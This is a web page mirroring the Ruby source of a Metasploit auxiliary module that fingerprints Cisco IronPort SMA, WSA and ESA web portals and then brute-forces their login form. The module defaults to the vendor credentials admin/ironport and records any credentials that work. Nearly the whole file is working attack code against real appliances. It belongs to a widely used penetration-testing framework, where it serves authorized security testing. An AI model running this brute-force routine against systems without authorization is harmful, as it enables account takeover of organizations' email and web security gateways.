Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/http/cisco_ironport_enum.rb
19591 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8
  include Msf::Auxiliary::Report

9
  include Msf::Auxiliary::AuthBrute

10
  include Msf::Auxiliary::Scanner

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Cisco Ironport Bruteforce Login Utility',

17
        'Description' => %q{

18
          This module scans for Cisco Ironport SMA, WSA and ESA web login portals, finds AsyncOS

19
          versions, and performs login brute force to identify valid credentials.

20
        },

21
        'Author' => [

22
          'Karn Ganeshen <KarnGaneshen[at]gmail.com>',

23
        ],

24
        'License' => MSF_LICENSE,

25
        'DefaultOptions' => { 'SSL' => true },

26
        'Notes' => {

27
          'Reliability' => UNKNOWN_RELIABILITY,

28
          'Stability' => UNKNOWN_STABILITY,

29
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

30
        }

31
      )

32
    )

33


34
    register_options(

35
      [

36
        Opt::RPORT(443),

37
        OptString.new('USERNAME', [true, "A specific username to authenticate as", "admin"]),

38
        OptString.new('PASSWORD', [true, "A specific password to authenticate with", "ironport"])

39
      ]

40
    )

41
  end

42


43
  def run_host(ip)

44
    unless check_conn?

45
      print_error("#{rhost}:#{rport} - Connection failed, Aborting...")

46
      return

47
    end

48


49
    unless is_app_ironport?

50
      print_error("#{rhost}:#{rport} - Application does not appear to be Cisco Ironport. Module will not continue.")

51
      return

52
    end

53


54
    print_status("#{rhost}:#{rport} - Starting login brute force...")

55
    each_user_pass do |user, pass|

56
      do_login(user, pass)

57
    end

58
  end

59


60
  def check_conn?

61
    begin

62
      res = send_request_cgi(

63
        {

64
          'uri' => '/',

65
          'method' => 'GET'

66
        }

67
      )

68
      if res

69
        print_good("#{rhost}:#{rport} - Server is responsive...")

70
        return true

71
      end

72
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE

73
    end

74
    false

75
  end

76


77
  #

78
  # What's the point of running this module if the app actually isn't Cisco IronPort

79
  #

80


81
  def is_app_ironport?

82
    res = send_request_cgi(

83
      {

84
        'uri' => '/',

85
        'method' => 'GET'

86
      }

87
    )

88


89
    if res && res.get_cookies

90


91
      cookie = res.get_cookies

92


93
      res = send_request_cgi(

94
        {

95
          'uri' => "/help/wwhelp/wwhimpl/common/html/default.htm",

96
          'method' => 'GET',

97
          'cookie'	=> cookie

98
        }

99
      )

100


101
      if (res and res.code == 200 and res.body.include?('Cisco IronPort AsyncOS'))

102
        version_key = /Cisco IronPort AsyncOS (.+? )/

103
        version = res.body.scan(version_key).flatten[0].gsub('"', '')

104
        product_key = /for (.*)</

105
        product = res.body.scan(product_key).flatten[0]

106


107
        if (product == 'Security Management Appliances')

108
          p_name = 'Cisco IronPort Security Management Appliance (SMA)'

109
          print_good("#{rhost}:#{rport} - Running Cisco IronPort #{product} (SMA) - AsyncOS v#{version}")

110
        elsif (product == 'Cisco IronPort Web Security Appliances')

111
          p_name = 'Cisco IronPort Web Security Appliance (WSA)'

112
          print_good("#{rhost}:#{rport} - Running #{product} (WSA) - AsyncOS v#{version}")

113
        elsif (product == 'Cisco IronPort Appliances')

114
          p_name = 'Cisco IronPort Email Security Appliance (ESA)'

115
          print_good("#{rhost}:#{rport} - Running #{product} (ESA) - AsyncOS v#{version}")

116
        end

117


118
        return true

119
      else

120
        return false

121
      end

122
    else

123
      return false

124
    end

125
  end

126


127
  def service_details

128
    super.merge({ service_name: 'Cisco IronPort Appliance' })

129
  end

130


131
  #

132
  # Brute-force the login page

133
  #

134


135
  def do_login(user, pass)

136
    vprint_status("#{rhost}:#{rport} - Trying username:#{user.inspect} with password:#{pass.inspect}")

137
    begin

138
      res = send_request_cgi(

139
        {

140
          'uri' => '/login',

141
          'method' => 'POST',

142
          'vars_post' =>

143
            {

144
              'action' => 'Login',

145
              'referrer' => '',

146
              'screen' => 'login',

147
              'username' => user,

148
              'password' => pass

149
            }

150
        }

151
      )

152


153
      if res and res.get_cookies.include?('authenticated=')

154
        print_good("#{rhost}:#{rport} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")

155


156
        store_valid_credential(user: user, private: pass, proof: res.get_cookies.inspect)

157
        return :next_user

158


159
      else

160
        vprint_error("#{rhost}:#{rport} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}")

161
      end

162
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE

163
      print_error("#{rhost}:#{rport} - HTTP Connection Failed, Aborting")

164
      return :abort

165
    end

166
  end

167
end

168


169